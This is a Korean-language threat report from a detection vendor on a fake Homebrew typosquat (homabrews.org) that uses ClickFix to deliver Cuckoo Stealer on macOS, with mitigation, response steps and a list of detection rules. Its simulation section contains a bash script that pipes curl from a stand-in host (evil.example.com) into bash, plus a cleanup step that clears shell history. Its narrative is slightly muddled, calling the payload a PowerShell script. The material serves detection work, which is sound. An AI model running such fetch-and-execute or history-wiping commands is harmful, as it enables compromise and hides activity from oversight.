SOC Prime Bias: 중간

18 Feb 2026 14:39 UTC

가짜 홈브류 오타 입력 사이트, 클릭픽스를 통해 쿠쿠 스틸러 배포에 사용

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
가짜 홈브류 오타 입력 사이트, 클릭픽스를 통해 쿠쿠 스틸러 배포에 사용
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 보고서는 타이포스쿼팅된 홈브류 도메인을 악용하여 macOS 개발자가 ClickFix 기법을 통해 악성 “설치” 명령어를 실행하도록 유도하는 캠페인을 설명합니다. 조작된 curl 원라이너가 피해자를 공격자 제어 인프라로 보내며, 인증 정보를 수집하는 로더를 배포하고 이어서 Cuckoo Stealer 정보 유출을 진행합니다. 이 악성 코드는 LaunchAgent를 통해 지속성을 유지하고, 격리 속성을 제거하며, HTTPS를 통해 인증 정보와 지갑 데이터를 유출합니다. 탐지는 curl 명령어 패턴과 관련 인프라에 중점을 두어야 합니다.

조사

연구자들은 초기 유인을 homabrews.org로 추적했으며, 네덜란드에서 5.255.123.244로 해석되고, 여러 유사 도메인을 호스팅했습니다(전달에 사용되는 raw.homabrews.org 포함). 다운로드된 스크립트는 dscl authonly 루프를 실행하여 macOS 인증을 검증한 후, brew_agent라는 바이너리를 가져옵니다. 두 번째 단계에서는, Cuckoo Stealer가 LaunchAgent plist를 생성하고, 격리 플래그를 제거하며, X25519 키 교환을 통해 암호화된 페이로드로 C2와 통신합니다. 인프라 헌팅을 통해 동일한 호스팅 IP를 공유하는 최소 여섯 개의 도메인 네트워크가 밝혀졌습니다.

완화

개발자에게 홈브류 설치 URL을 확인하고 신뢰할 수 없는 명령어를 터미널에 복사-붙여넣기하지 않도록 교육합니다. 명령 줄 로깅을 활성화하고, curl이 원격 스크립트를 즉시 실행하기 위해 가져오는 패턴, 특히 “curl | sh” 스타일의 원라이너를 제한합니다. 엔드포인트 보호는 의심스러운 LaunchAgent 생성 및 격리 속성 제거에 경고를 제공해야 합니다. 네트워크 방어는 알려진 악성 도메인을 차단하고, raw.homabrews.org 및 관련 호스트로의 트래픽을 식별해야 합니다.

대응

의심스러운 curl 명령이 감지되면, 엔드포인트를 격리하고 스크립트와 brew_agent 바이너리를 캡처하며 LaunchAgent plist를 수집하여 분석합니다. 수집된 인증 정보를 재설정하고 브라우저, 키체인 및 암호화폐 지갑에 대해 손상된 토큰을 취소합니다. 숨겨진 BrewUpdater 디렉토리, 생성된 모든 바로 가기 등을 포렌식 검토하고 악성 파일을 제거합니다. 추출된 IOC로 탐지를 업데이트하고 동일한 인프라의 재사용을 모니터링합니다.

공격 흐름

탐지

의심스러운 키체인 활동(프로세스 생성 경유)

SOC 프라임 팀
2026년 2월 18일

MacOS 의심스러운 Tmp 폴더 파일 권한 수정(cmdline 경유)

SOC 프라임 팀
2026년 2월 18일

의심스러운 MacOS – Plist 위치 및 이름 (파일 이벤트 경유)

SOC 프라임 팀
2026년 2월 18일

의심스러운 MacOS 저장 브라우저 인증 정보 접근(프로세스 생성 경유)

SOC 프라임 팀
2026년 2월 18일

MacOS 시스템 볼륨이 Osascript로 음소거됨(cmdline 경유)

SOC 프라임 팀
2026년 2월 18일

MacOS Screencapture 실행 시도에 의한 수집 가능성(cmdline 경유)

SOC 프라임 팀
2026년 2월 18일

의심스러운 Curl 실행 시도 [MacOS](cmdline 경유)

SOC 프라임 팀
2026년 2월 18일

IOCs (HashSha256) 탐지: 가짜 홈브류 타이포스쿼트를 사용하여 Cuckoo Stealer 전달 via ClickFix

SOC 프라임 AI 규칙
2026년 2월 18일

IOCs (SourceIP) 탐지: 가짜 홈브류 타이포스쿼트를 사용하여 Cuckoo Stealer 전달 via ClickFix

SOC 프라임 AI 규칙
2026년 2월 18일

IOCs (DestinationIP) 탐지: 가짜 홈브류 타이포스쿼트를 사용하여 Cuckoo Stealer 전달 via ClickFix

SOC 프라임 AI 규칙
2026년 2월 18일

ClickFix를 통한 악성 macOS 설치 명령어 탐지 [Linux 프로세스 생성]

SOC 프라임 AI 규칙
2026년 2월 18일

ClickFix 캠페인의 타이포스쿼팅 도메인 및 악성 IP 탐지 [네트워크 지표]

SOC 프라임 AI 규칙
2026년 2월 18일

시뮬레이션 실행

전제조건: 텔레메트리 및 기준 전처리 확인이 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 공격자 기법(TTP)의 정확한 실행을 설명합니다. 명령어와 설명은 반드시 식별된 TTP를 직접 반영하고 탐지 논리에 의해 예상되는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 것입니다.

  • 공격 서사 및 명령어:
    공격자는 C2 서버에 호스팅된 악성 PowerShell 인코딩 스크립트를 확보했습니다. 디스크에 파일을 쓰는 것을 피하기 위해, 공격자는 스크립트를 curl -fsSL-c 플래그를 사용하여 직접 Bash 셸에 스트림합니다. 명령어는 손상된 사용자 계정에서 상호작용적으로 실행되어 합법적인 “클릭-픽스” 설치 프로그램을 모방합니다. 단계는 다음과 같습니다:

    1. 악성 페이로드 URL 확인(예: https://evil.example.com/payload.sh).
    2. 다운로드를 Bash에 파이프로 전달하여 내용을 -c.
    3. 와 함께 실행하도록 지시합니다. 페이로드는 자격 증명 수집, 숨겨진 파일 생성 및 임시 스크립트 삭제(포함 T1070.004).
  • 회귀 테스트 스크립트:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # 악성 macOS 설치 프로그램 시뮬레이션 (ClickFix 스타일)
    # -------------------------------------------------
    set -euo pipefail
    
    MALICIOUS_URL="https://evil.example.com/payload.sh"
    
    # -c로 Bash에 직접 페이로드 스트림
    curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)"
    
    # 페이로드 자체가 악성 작업을 수행한다고 가정합니다.
    # 테스트 목적으로 우리는 단순히 마커를 에코합니다.
    echo "악성 페이로드가 실행되었습니다"
  • 정리 명령어:

    # 페이로드가 생성했을 수 있는 파일 제거
    rm -f /tmp/payload.sh
    # 포렌식 흔적을 줄이기 위해 명령어 기록 지우기(선택 사항)
    history -c